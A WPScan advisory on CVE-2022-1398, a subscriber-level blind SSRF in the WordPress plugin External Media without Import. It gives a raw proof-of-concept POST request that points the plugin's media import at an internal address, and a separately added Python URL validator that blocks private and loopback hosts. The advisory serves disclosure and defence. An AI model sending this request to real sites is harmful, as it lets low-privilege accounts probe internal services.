WPScan

WordPress Plugin Vulnerabilities

External Media without Import <= 1.1.2 - Subscriber+ Blind SSRF

Description

The plugin does not perform any authorisation check and does not ensure that media added via URLs are actually external, which could allow any authenticated user, such as a subscriber, to perform blind SSRF attacks.

Proof of Concept

Put an internal URL such as http://127.0.0.1:8080 in the "Add medias from URLs" feature of the plugin (/wp-admin/upload.php?page=add-external-media-without-import)

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

urls=http%3A%2F%2F127.0.0.1%3A8080%2Fyolo&width=&height=&mime-type=&action=add_external_media_without_import 
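A server-side gate that closes both gaps the description names (no authorisation, no check that the supplied URL is external), added here as an illustration and not the plugin's own code: the `user_can_upload_files` flag, the injectable `resolver` parameter and the `STUB_DNS` table are assumptions so the logic runs offline, and it rejects literal loopback, private, link-local and IPv4-mapped addresses as well as hostnames that resolve to any such address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

STUB_DNS = {  # constructed, offline stand-in for DNS answers; not real data
    "cdn.example": {"93.184.216.34"},
    "intranet.corp": {"10.0.0.5"},
    "dual.example": {"93.184.216.34", "127.0.0.1"},  # mixed answer: reject
}

def resolve_host(host):
    """Every IP the host currently resolves to (an attacker may control DNS)."""
    return {info[4][0].split("%")[0] for info in socket.getaddrinfo(host, None)}

def stub_resolver(host):
    if host not in STUB_DNS:
        raise OSError("no such host")
    return STUB_DNS[host]

def is_public_ip(ip):
    """True only for globally routable unicast; unwraps ::ffff:a.b.c.d first."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr.is_global and not (addr.is_multicast or addr.is_reserved)

def is_external_media_url(url, resolver=resolve_host):
    """Accept only http(s) URLs without credentials whose host maps solely
    to public addresses; a literal IP is checked without any lookup."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False
    try:
        addresses = {str(ipaddress.ip_address(parts.hostname))}
    except ValueError:
        try:
            addresses = resolver(parts.hostname)
        except OSError:  # NXDOMAIN, timeout: fail closed
            return False
    return bool(addresses) and all(is_public_ip(ip) for ip in addresses)

def accept_media_urls(urls, user_can_upload_files, resolver=resolve_host):
    """Gate for an 'add media from URLs' action: authorise first, then keep
    only URLs that point outside the deployment."""
    if not user_can_upload_files:
        raise PermissionError("upload_files capability required")
    return [u for u in urls if is_external_media_url(u, resolver)]
```

In a WordPress plugin the same two checks map to `current_user_can( 'upload_files' )` and `wp_http_validate_url()` before any fetch. Resolve-then-fetch can still be raced through DNS rebinding, so the fetch should connect to the address that was validated rather than re-resolving the name.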

Affects Plugins

external-media-without-import
No known fix - plugin closed

References

CVE
CVE-2022-1398

Classification

Type

SSRF

OWASP top 10
A1: Injection
CWE
CWE-918

Miscellaneous

Original Researcher

Luan Pedersini

Submitter

IBLISS Digital Security

Submitter website
https://ibliss.com.br
Verified

Yes

WPVDB ID
5440d177-e995-403e-b2c9-42ceda14579e

Timeline

Publicly Published

2022-04-19

Added

2022-04-19

Last Updated

2022-04-20
